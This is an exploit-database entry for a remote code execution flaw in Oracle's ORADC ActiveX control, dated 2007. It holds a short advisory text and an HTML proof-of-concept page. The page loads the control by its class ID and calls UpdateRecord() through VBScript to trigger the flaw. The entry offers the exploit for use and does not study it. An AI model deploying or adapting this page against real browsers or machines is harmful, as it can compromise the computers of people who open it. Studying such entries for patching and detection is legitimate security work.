[] NeoSense

Oracle ORADC - ActiveX Control Remote Code Execution

Author: Umesh Wanve
type: remote
platform: multiple
port: 
date_added: 2007-01-12 
date_updated: 2013-11-06 
verified: 1 
codes:  
tags: 
aliases:  
screenshot_url:  
application_url: 

source: https://www.securityfocus.com/bid/22026/info

Oracle ORADC ActiveX control is prone to a remote code-execution vulnerability.

Exploiting this issue allows remote attackers to execute arbitrary machine code in the context of applications using the affected ActiveX control and possibly to compromise affected computers.

<!--
// CLSID: {EC4CF635-D196-11CE-9027-02608C4BF3B5}
// Info: ORADC Control
// ProgID: ORADC.ORADCCtrl.1
// InprocServer32: C:\\Oracle\\Ora81\\bin\\oradc.ocx
--!>

<html>

<body>
<OBJECT id="test" WIDTH=445 HEIGHT=40
classid="clsid:EC4CF635-D196-11CE-9027-02608C4BF3B5" >
</OBJECT>

<script language="vbscript">


test.UpdateRecord()


</script>

</body>
</html>